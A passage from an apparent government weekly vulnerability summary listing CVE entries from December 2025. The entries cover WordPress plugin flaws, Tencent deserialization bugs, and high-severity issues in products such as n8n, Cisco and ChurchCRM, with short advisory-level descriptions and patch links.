| Tencent--PatrickStar | Tencent PatrickStar merge_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent PatrickStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the merge_checkpoint endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27182. | 2025-12-23 | not yet calculated | CVE-2025-13706 | ZDI-25-1034 vendor-provided URL |
| Tencent--TFace | Tencent TFace restore_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the restore_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27185. | 2025-12-23 | not yet calculated | CVE-2025-13709 | ZDI-25-1036 vendor-provided URL |
| Tencent--TFace | Tencent TFace eval Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the eval endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27187. | 2025-12-23 | not yet calculated | CVE-2025-13711 | ZDI-25-1035 vendor-provided URL |
| The Plugin Factory--Google AdSense for Responsive Design | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Plugin Factory Google AdSense for Responsive Design – GARD google-adsense-for-responsive-design-gard allows DOM-Based XSS.This issue affects Google AdSense for Responsive Design – GARD: from n/a through <= 2.23. | 2025-12-24 | not yet calculated | CVE-2025-67632 | https://vdp.patchstack.com/database/Wordpress/Plugin/google-adsense-for-responsive-design-gard/vulnerability/wordpress-google-adsense-for-responsive-design-gard-plugin-2-23-cross-site-scripting-xss-vulnerability?_s_id=cve |
| thembay--Fana | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Fana fana allows PHP Local File Inclusion. This issue affects Fana: from n/a through <= 1.1.35. | 2025-12-24 | not yet calculated | CVE-2025-68540 | https://vdp.patchstack.com/database/Wordpress/Theme/fana/vulnerability/wordpress-fana-theme-1-1-35-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Zota | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Zota zota allows PHP Local File Inclusion. This issue affects Zota: from n/a through <= 1.3.14. | 2025-12-24 | not yet calculated | CVE-2025-68537 | https://vdp.patchstack.com/database/Wordpress/Theme/zota/vulnerability/wordpress-zota-theme-1-3-14-local-file-inclusion-vulnerability?_s_id=cve |
| Tikweb Management--Fast User Switching | Cross-Site Request Forgery (CSRF) vulnerability in Tikweb Management Fast User Switching fast-user-switching allows Cross Site Request Forgery. This issue affects Fast User Switching: from n/a through <= 1.4.10. | 2025-12-24 | not yet calculated | CVE-2025-68583 | https://vdp.patchstack.com/database/Wordpress/Plugin/fast-user-switching/vulnerability/wordpress-fast-user-switching-plugin-1-4-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| titopandub--Evergreen Post Tweeter | Cross-Site Request Forgery (CSRF) vulnerability in titopandub Evergreen Post Tweeter evergreen-post-tweeter allows Stored XSS. This issue affects Evergreen Post Tweeter: from n/a through <= 1.8.9. | 2025-12-24 | not yet calculated | CVE-2025-67622 | https://vdp.patchstack.com/database/Wordpress/Plugin/evergreen-post-tweeter/vulnerability/wordpress-evergreen-post-tweeter-plugin-1-8-9-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve |
| tmtraderunner--Trade Runner | Cross-Site Request Forgery (CSRF) vulnerability in tmtraderunner Trade Runner traderunner allows Cross Site Request Forgery. This issue affects Trade Runner: from n/a through <= 3.14. | 2025-12-24 | not yet calculated | CVE-2025-67625 | https://vdp.patchstack.com/database/Wordpress/Plugin/traderunner/vulnerability/wordpress-trade-runner-plugin-3-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| totalsoft--TS Poll | Missing Authorization vulnerability in totalsoft TS Poll poll-wp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TS Poll: from n/a through <= 2.5.3. | 2025-12-24 | not yet calculated | CVE-2025-68588 | https://vdp.patchstack.com/database/Wordpress/Plugin/poll-wp/vulnerability/wordpress-ts-poll-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| TouchOfTech--Draft Notify | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TouchOfTech Draft Notify draft-notify allows Stored XSS. This issue affects Draft Notify: from n/a through <= 1.5. | 2025-12-24 | not yet calculated | CVE-2025-67627 | https://vdp.patchstack.com/database/Wordpress/Plugin/draft-notify/vulnerability/wordpress-draft-notify-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TradingView--Desktop | TradingView Desktop Electron Uncontrolled Search Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of TradingView Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of the Electron framework. The product loads a script file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-27395. | 2025-12-23 | not yet calculated | CVE-2025-14498 | ZDI-25-1070 |
| Trustindex--Widgets for Social Photo Feed | Missing Authorization vulnerability in Trustindex Widgets for Social Photo Feed social-photo-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Widgets for Social Photo Feed: from n/a through <= 1.7.7. | 2025-12-24 | not yet calculated | CVE-2025-68595 | https://vdp.patchstack.com/database/Wordpress/Plugin/social-photo-feed-widget/vulnerability/wordpress-widgets-for-social-photo-feed-plugin-1-7-7-broken-access-control-vulnerability?_s_id=cve |
| Unknown--Gravity Forms | The Gravity Forms WordPress plugin before 2.9.23.1 does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path. | 2025-12-24 | not yet calculated | CVE-2025-13407 | https://wpscan.com/vulnerability/e09908fb-f5ad-45ca-8698-c0d596fd39cc/ |
| VIPRE--Advanced Security | VIPRE Advanced Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of VIPRE Advanced Security for PC. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the product installer. The issue results from incorrect permissions on a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27147. | 2025-12-23 | not yet calculated | CVE-2025-13703 | ZDI-25-1023 vendor-provided URL |
| Virusdie--Virusdie | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Virusdie Virusdie virusdie allows Retrieve Embedded Sensitive Data. This issue affects Virusdie: from n/a through <= 1.1.6. | 2025-12-24 | not yet calculated | CVE-2025-68576 | https://vdp.patchstack.com/database/Wordpress/Plugin/virusdie/vulnerability/wordpress-virusdie-plugin-1-1-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| Virusdie--Virusdie | Missing Authorization vulnerability in Virusdie Virusdie virusdie allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Virusdie: from n/a through <= 1.1.6. | 2025-12-24 | not yet calculated | CVE-2025-68577 | https://vdp.patchstack.com/database/Wordpress/Plugin/virusdie/vulnerability/wordpress-virusdie-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve |
| voidcoders--WPBakery Visual Composer WHMCS Elements | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in voidcoders WPBakery Visual Composer WHMCS Elements void-visual-whmcs-element allows DOM-Based XSS.This issue affects WPBakery Visual Composer WHMCS Elements: from n/a through <= 1.0.4.3. | 2025-12-24 | not yet calculated | CVE-2025-68574 | https://vdp.patchstack.com/database/Wordpress/Plugin/void-visual-whmcs-element/vulnerability/wordpress-wpbakery-visual-composer-whmcs-elements-plugin-1-0-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wappointment team--Wappointment | Missing Authorization vulnerability in Wappointment team Wappointment wappointment allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wappointment: from n/a through <=2.7.2. | 2025-12-24 | not yet calculated | CVE-2025-68575 | https://vdp.patchstack.com/database/Wordpress/Plugin/wappointment/vulnerability/wordpress-wappointment-plugin-2-7-2-broken-access-control-vulnerability?_s_id=cve |
| wb2osz--Dire Wolf | wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 694c954, contain a stack-based buffer overflow vulnerability in the function kiss_rec_byte() located in src/kiss_frame.c. When processing crafted KISS frames that reach the maximum allowed frame length (MAX_KISS_LEN), the function appends a terminating FEND byte without reserving sufficient space in the stack buffer. This results in an out-of-bounds write followed by an out-of-bounds read during the subsequent call to kiss_unwrap(), leading to stack memory corruption or application crashes. This vulnerability may allow remote unauthenticated attackers to trigger a denial-of-service condition. | 2025-12-22 | not yet calculated | CVE-2025-34457 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-010-direwolf-stack-buffer-overflow-kiss-frame.md https://github.com/wb2osz/direwolf/issues/617 https://github.com/wb2osz/direwolf/commit/694c954 https://www.vulncheck.com/advisories/wb2osz-direwolf-stack-based-buffer-overflow-dos |
| wb2osz--Dire Wolf | wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 3658a87, contain a reachable assertion vulnerability in the APRS MIC-E decoder function aprs_mic_e() located in src/decode_aprs.c. When processing a specially crafted AX.25 frame containing a MIC-E message with an empty or truncated comment field, the application triggers an unhandled assertion checking for a non-empty comment. This assertion failure causes immediate process termination, allowing a remote, unauthenticated attacker to cause a denial of service by sending malformed APRS traffic. | 2025-12-22 | not yet calculated | CVE-2025-34458 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-010-direwolf-stack-buffer-overflow-kiss-frame.md https://github.com/wb2osz/direwolf/issues/618 https://github.com/wb2osz/direwolf/commit/3658a87 https://www.vulncheck.com/advisories/wb2osz-direwolf-reachable-assertion-dos |
| webheadcoder--WH Tweaks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webheadcoder WH Tweaks wh-tweaks allows Stored XSS. This issue affects WH Tweaks: from n/a through <= 1.0.2. | 2025-12-24 | not yet calculated | CVE-2025-67630 | https://vdp.patchstack.com/database/Wordpress/Plugin/wh-tweaks/vulnerability/wordpress-wh-tweaks-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Shuffle--Subscribe to Unlock Lite | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WP Shuffle Subscribe to Unlock Lite subscribe-to-unlock-lite allows PHP Local File Inclusion. This issue affects Subscribe to Unlock Lite: from n/a through <= 1.3.0. | 2025-12-24 | not yet calculated | CVE-2025-68563 | https://vdp.patchstack.com/database/Wordpress/Plugin/subscribe-to-unlock-lite/vulnerability/wordpress-subscribe-to-unlock-lite-plugin-1-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| WP Socio--WP Telegram Widget and Join Link | Missing Authorization vulnerability in WP Socio WP Telegram Widget and Join Link wptelegram-widget allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Telegram Widget and Join Link: from n/a through <= 2.2.11. | 2025-12-24 | not yet calculated | CVE-2025-68589 | https://vdp.patchstack.com/database/Wordpress/Plugin/wptelegram-widget/vulnerability/wordpress-wp-telegram-widget-and-join-link-plugin-2-2-11-broken-access-control-vulnerability?_s_id=cve |
| WP Swings--Membership For WooCommerce | Authorization Bypass Through User-Controlled Key vulnerability in WP Swings Membership For WooCommerce membership-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Membership For WooCommerce: from n/a through <= 3.0.3. | 2025-12-24 | not yet calculated | CVE-2025-67909 | https://vdp.patchstack.com/database/Wordpress/Plugin/membership-for-woocommerce/vulnerability/wordpress-membership-for-woocommerce-plugin-3-0-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WPFactory--Free Shipping Bar: Amount Left for Free Shipping for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Free Shipping Bar: Amount Left for Free Shipping for WooCommerce amount-left-free-shipping-woocommerce allows Stored XSS. This issue affects Free Shipping Bar: Amount Left for Free Shipping for WooCommerce: from n/a through <= 2.4.9. | 2025-12-24 | not yet calculated | CVE-2025-68528 | https://vdp.patchstack.com/database/Wordpress/Plugin/amount-left-free-shipping-woocommerce/vulnerability/wordpress-free-shipping-bar-amount-left-for-free-shipping-for-woocommerce-plugin-2-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wphocus--My auctions allegro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Stored XSS. This issue affects My auctions allegro: from n/a through <= 3.6.32. | 2025-12-24 | not yet calculated | CVE-2025-68566 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wphocus--My auctions allegro | Cross-Site Request Forgery (CSRF) vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Cross Site Request Forgery. This issue affects My auctions allegro: from n/a through <= 3.6.32. | 2025-12-24 | not yet calculated | CVE-2025-68567 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| wpstream--WpStream | Missing Authorization vulnerability in wpstream WpStream wpstream allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpStream: from n/a through <= 4.9.5. | 2025-12-24 | not yet calculated | CVE-2025-68521 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpstream/vulnerability/wordpress-wpstream-plugin-4-9-5-broken-access-control-vulnerability?_s_id=cve |
| wpstream--WpStream | Missing Authorization vulnerability in wpstream WpStream wpstream allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpStream: from n/a through <= 4.9.5. | 2025-12-24 | not yet calculated | CVE-2025-68522 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpstream/vulnerability/wordpress-wpstream-plugin-4-9-5-broken-access-control-vulnerability-2?_s_id=cve |
| WPXPO--PostX | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPXPO PostX ultimate-post allows Retrieve Embedded Sensitive Data. This issue affects PostX: from n/a through <= 5.0.3. | 2025-12-24 | not yet calculated | CVE-2025-68606 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-5-0-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Yannick Lefebvre--Link Library | Server-Side Request Forgery (SSRF) vulnerability in Yannick Lefebvre Link Library link-library allows Server Side Request Forgery. This issue affects Link Library: from n/a through <= 7.8.4. | 2025-12-24 | not yet calculated | CVE-2025-68600 | https://vdp.patchstack.com/database/Wordpress/Plugin/link-library/vulnerability/wordpress-link-library-plugin-7-8-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| YITHEMES--YITH Slider for page builders | Missing Authorization vulnerability in YITHEMES YITH Slider for page builders yith-slider-for-page-builders allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects YITH Slider for page builders: from n/a through <= 1.0.11. | 2025-12-24 | not yet calculated | CVE-2025-68581 | https://vdp.patchstack.com/database/Wordpress/Plugin/yith-slider-for-page-builders/vulnerability/wordpress-yith-slider-for-page-builders-plugin-1-0-11-broken-access-control-vulnerability?_s_id=cve |
Vulnerability Summary for the Week of December 15, 2025
Posted on Monday December 22, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Cisco--Cisco Secure Email | Cisco is aware of a potential vulnerability. Cisco is currently investigating and will update these details as appropriate as more information becomes available. | 2025-12-17 | 10 | CVE-2025-20393 | cisco-sa-sma-attack-N9bf4 |
| Hewlett Packard Enterprise (HPE)--HPE OneView | A remote code execution issue exists in HPE OneView. | 2025-12-16 | 10 | CVE-2025-37164 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn4985en_us&docLocale=en_US |
| smallstep--Step-CA | An attacker can bypass authorization checks and force a Step CA ACME or SCEP provisioner to create certificates without completing certain protocol authorization checks. | 2025-12-17 | 10 | CVE-2025-44005 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2242 https://github.com/smallstep/certificates/security/advisories/GHSA-h8cp-697h-8c8p |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 5.21.0, a pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard allows unauthenticated attackers to inject arbitrary PHP code during the initial installation process, leading to complete server compromise. The vulnerability exists in `setup/routes/setup.php` where user input from the setup form is directly concatenated into a PHP configuration template without any validation or sanitization. Any parameter in the setup form can be used to inject PHP code that gets written to `Include/Config.php`, which is then executed on every page load. This is more severe than typical authenticated RCE vulnerabilities because it requires no credentials and affects the installation process that administrators must complete. Version 5.21.0 patches the issue. | 2025-12-17 | 10 | CVE-2025-62521 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-m8jq-j3p9-2xf3 |
| Microsoft--Azure Container Apps | Improper control of generation of code ('code injection') in Azure Container Apps allows an unauthorized attacker to execute code over a network. | 2025-12-18 | 10 | CVE-2025-65037 | Azure Container Apps Remote Code Execution Vulnerability |
| Microsoft--Microsoft Partner Center | Improper authorization in Microsoft Partner Center allows an unauthorized attacker to elevate privileges over a network. | 2025-12-18 | 10 | CVE-2025-65041 | Microsoft Partner Center Elevation of Privilege Vulnerability |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Versions prior to 6.5.3 may disclose database information in an error message including the host, ip, username, and password. Version 6.5.3 fixes the issue. | 2025-12-17 | 10 | CVE-2025-68110 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Versions starting with 0.211.0 and prior to 1.120.4, 1.121.1, and 1.122.0 contain a critical Remote Code Execution (RCE) vulnerability in their workflow expression evaluation system. Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime. An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations. This issue has been fixed in versions 1.120.4, 1.121.1, and 1.122.0. Users are strongly advised to upgrade to a patched version, which introduces additional safeguards to restrict expression evaluation. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only; and/or deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation. These workarounds do not fully eliminate the risk and should only be used as short-term measures. | 2025-12-19 | 10 | CVE-2025-68613 | https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79 https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000 https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316 |
| Dulldusk--phpfm | phpfm 1.7.9 contains an authentication bypass vulnerability that allows attackers to log in by exploiting loose type comparison in password hash validation. Attackers can craft specific password hashes beginning with 0e or 00e to bypass authentication and upload malicious PHP files to the server. | 2025-12-16 | 9.8 | CVE-2023-53894 | ExploitDB-51594 phpFileManager Product Webpage VulnCheck Advisory: phpfm 1.7.9 Authentication Bypass via Type Juggling Vulnerability |
| Pimpmylog--PimpMyLog | PimpMyLog 1.7.14 contains an improper access control vulnerability that allows remote attackers to create admin accounts without authorization through the configuration endpoint. Attackers can exploit the unsanitized username field to inject malicious JavaScript, create a hidden backdoor account, and potentially access sensitive server-side log information and environmental variables. | 2025-12-16 | 9.8 | CVE-2023-53895 | ExploitDB-51593 Pimp My Log Product Webpage Pimp My Log GitHub Repository VulnCheck Advisory: PimpMyLog 1.7.14 Improper Access Control via Account Creation Endpoint |
| Unknown--Unknown | PodcastGenerator 3.2.9 contains a blind server-side request forgery vulnerability that allows attackers to inject XML in the episode upload form. Attackers can manipulate the 'shortdesc' parameter to trigger external HTTP requests to arbitrary endpoints during podcast episode creation. | 2025-12-16 | 9.8 | CVE-2023-53899 | ExploitDB-51565 Podcast Generator Product Homepage Podcast Generator GitHub Repository VulnCheck Advisory: PodcastGenerator 3.2.9 Blind Server-Side Request Forgery via XML Injection |
| ulicms--Ulicms | UliCMS 2023.1 contains an authentication bypass vulnerability that allows unauthenticated attackers to create admin users through mass assignment in the UserController. Attackers can send a crafted POST request to the admin index.php endpoint with specific parameters to generate an administrative account with full system access. | 2025-12-17 | 9.8 | CVE-2023-53914 | ExploitDB-51486 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1 Authentication Bypass via Mass Assignment Vulnerability |
| Sitemagic--SitemagicCMS | SitemagicCMS 4.4.3 contains a remote code execution vulnerability that allows attackers to upload malicious PHP files to the files/images directory. Attackers can upload a .phar file with system command execution payload to compromise the web application and execute arbitrary system commands. | 2025-12-17 | 9.8 | CVE-2023-53921 | ExploitDB-51464 Official Product Webpage VulnCheck Advisory: SitemagicCMS 4.4.3 Remote Code Execution via Unrestricted File Upload |
| TinyWebGallery--TinyWebGallery | TinyWebGallery v2.5 contains a remote code execution vulnerability in the admin upload functionality that allows unauthenticated attackers to upload malicious PHP files. Attackers can upload .phar files with embedded system commands to execute arbitrary code on the server by accessing the uploaded file's URL. | 2025-12-17 | 9.8 | CVE-2023-53922 | ExploitDB-51443 Official Product Webpage VulnCheck Advisory: TinyWebGallery v2.5 Remote Code Execution via Unrestricted File Upload |
| Ulicms--Ulicms | UliCMS 2023.1 contains a privilege escalation vulnerability that allows unauthenticated attackers to create administrative accounts through the UserController endpoint. Attackers can send a crafted POST request to /dist/admin/index.php with specific parameters to generate a new admin user with full system access. | 2025-12-17 | 9.8 | CVE-2023-53923 | ExploitDB-51433 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1 Privilege Escalation via Unauthenticated Admin Account Creation |
| PHPJabbers--Simple CMS | PHPJabbers Simple CMS 5.0 contains a SQL injection vulnerability in the 'column' parameter that allows remote attackers to manipulate database queries. Attackers can inject crafted SQL payloads through the 'column' parameter in the index.php endpoint to potentially extract or modify database information. | 2025-12-17 | 9.8 | CVE-2023-53926 | ExploitDB-51416 Official Product Homepage VulnCheck Advisory: PHPJabbers Simple CMS 5.0 SQL Injection via Column Parameter |
| projectSend--projectSend | ProjectSend r1605 contains an insecure direct object reference vulnerability that allows unauthenticated attackers to download private files by manipulating the download ID parameter. Attackers can access any user's private files by changing the 'id' parameter in the download request to process.php. | 2025-12-17 | 9.8 | CVE-2023-53930 | ExploitDB-51400 Official Product Homepage VulnCheck Advisory: ProjectSend r1605 Insecure Direct Object Reference File Download Vulnerability |
| Easyphp--EasyPHP Webserver | EasyPHP Webserver 14.1 contains an OS command injection vulnerability that allows unauthenticated attackers to execute arbitrary system commands by injecting malicious payloads through the app_service_control parameter. Attackers can send POST requests to /index.php?zone=settings with crafted app_service_control values to execute commands with administrative privileges. | 2025-12-18 | 9.8 | CVE-2023-53941 | ExploitDB-51430 Official Product Homepage VulnCheck Advisory: EasyPHP Webserver 14.1 Remote Code Execution |
| cat03--Lilac-Reloaded | Lilac-Reloaded for Nagios 2.0.8 contains a remote code execution vulnerability in the autodiscovery feature that allows attackers to inject arbitrary commands. Attackers can exploit the lack of input filtering in the nmap_binary parameter to execute a reverse shell by sending a crafted POST request to the autodiscovery endpoint. | 2025-12-19 | 9.8 | CVE-2023-53948 | ExploitDB-51374 Official Product Homepage VulnCheck Advisory: Lilac-Reloaded for Nagios 2.0.8 Remote Code Execution via Autodiscovery |
| innovastudio--WYSIWYG Editor | InnovaStudio WYSIWYG Editor 5.4 contains an unrestricted file upload vulnerability that allows attackers to bypass file extension restrictions through filename manipulation. Attackers can upload malicious ASP shells by using null byte techniques and alternate file extensions to circumvent upload controls in the asset manager. | 2025-12-19 | 9.8 | CVE-2023-53950 | ExploitDB-51362 Official Vendor Homepage VulnCheck Advisory: InnovaStudio WYSIWYG Editor 5.4 Unrestricted File Upload via Filename Manipulation |
| Gauzy--ever gauzy | Ever Gauzy v0.281.9 contains a JWT authentication vulnerability that allows attackers to exploit weak HMAC secret key implementation. Attackers can leverage the exposed JWT token to authenticate and gain unauthorized access with administrative permissions. | 2025-12-19 | 9.8 | CVE-2023-53951 | ExploitDB-51354 Official Product Homepage VulnCheck Advisory: Ever Gauzy v0.281.9 JWT Authentication Weakness via HMAC Secret |
| Kimai--Kimai | Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking. | 2025-12-19 | 9.8 | CVE-2023-53957 | ExploitDB-51278 Official Product Homepage VulnCheck Advisory: Kimai 1.30.10 SameSite Cookie Vulnerability Session Hijacking |
| filezilla-project--FileZilla Client | FileZilla Client 3.63.1 contains a DLL hijacking vulnerability that allows attackers to execute malicious code by placing a crafted TextShaping.dll in the application directory. Attackers can generate a reverse shell payload using msfvenom and replace the missing DLL to achieve remote code execution when the application launches. | 2025-12-19 | 9.8 | CVE-2023-53959 | ExploitDB-51267 Official Product Homepage VulnCheck Advisory: FileZilla Client 3.63.1 DLL Hijacking via Missing TextShaping.dll |
| Palantir--com.palantir.gotham:glutton | Glutton V1 service endpoints were exposed without any authentication on Gotham stacks, this could have allowed users that did not have any permission to hit glutton backend directly and read/update/delete data. The affected service has been patched and automatically deployed to all Apollo-managed Gotham Instances | 2025-12-19 | 9.1 | CVE-2024-49587 | https://palantir.safebase.us/?tcuUid=95e2d805-dd2f-4544-b164-e61100f47b11 |
| snowray--File Uploader for WooCommerce | The File Uploader for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the callback function for the 'add-image-data' REST API endpoint in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to upload arbitrary files to the Uploadcare service and subsequently download them on the affected site's server which may make remote code execution possible. | 2025-12-20 | 9.8 | CVE-2025-13329 | https://www.wordfence.com/threat-intel/vulnerabilities/id/da0f0e1a-bbf8-42a5-b330-b53134488ebd?source=cve https://wordpress.org/plugins/file-uploader-for-woocommerce/ |
| CMSSuperHeroes--Flex Store Users | The Flex Store Users plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.0. This is due to the 'fsUserHandle::signup' and the 'fsSellerRole::add_role_seller' functions not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can be exploited with the 'fs_type' parameter if the Flex Store Seller plugin is also activated. | 2025-12-20 | 9.8 | CVE-2025-13619 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2fc40ed-a6af-4069-be63-cb75e98cc98a?source=cve https://themeforest.net/item/autosmart-automotive-car-dealer-wordpress-theme/20322930 |
| Red Hat--Red Hat OpenShift GitOps 1.16 | A flaw was found in OpenShift GitOps. Namespace admins can create ArgoCD Custom Resources (CRs) that trick the system into granting them elevated permissions in other namespaces, including privileged namespaces. An authenticated attacker can then use these elevated permissions to create privileged workloads that run on master nodes, effectively giving them root access to the entire cluster. | 2025-12-15 | 9.1 | CVE-2025-13888 | RHSA-2025:23203 RHSA-2025:23206 RHSA-2025:23207 https://access.redhat.com/security/cve/CVE-2025-13888 RHBZ#2418361 |
| ays-pro--Fox LMS WordPress LMS Plugin | The Fox LMS - WordPress LMS Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.5.1. This is due to the plugin not properly validating the 'role' parameter when creating new users via the `/fox-lms/v1/payments/create-order` REST API endpoint. This makes it possible for unauthenticated attackers to create new user accounts with arbitrary roles, including administrator, leading to complete site compromise. | 2025-12-15 | 9.8 | CVE-2025-14156 | https://www.wordfence.com/threat-intel/vulnerabilities/id/de4f8d45-9522-4a32-bc98-be8dbf3a5cf1?source=cve https://plugins.trac.wordpress.org/changeset?old_path=%2Ffox-lms%2Ftags%2F1.0.5.0%2Fincludes%2Frest%2FPayments.php&new_path=%2Ffox-lms%2Ftags%2F1.0.5.2%2Fincludes%2Frest%2FPayments.php |
| Arcadia Technology, LLC--Crafty Controller | An input neutralization vulnerability in the Webhook Template component of Crafty Controller allows a remote, authenticated attacker to perform remote code execution via Server Side Template Injection. | 2025-12-17 | 9.9 | CVE-2025-14700 | GitLab Issue #646 |
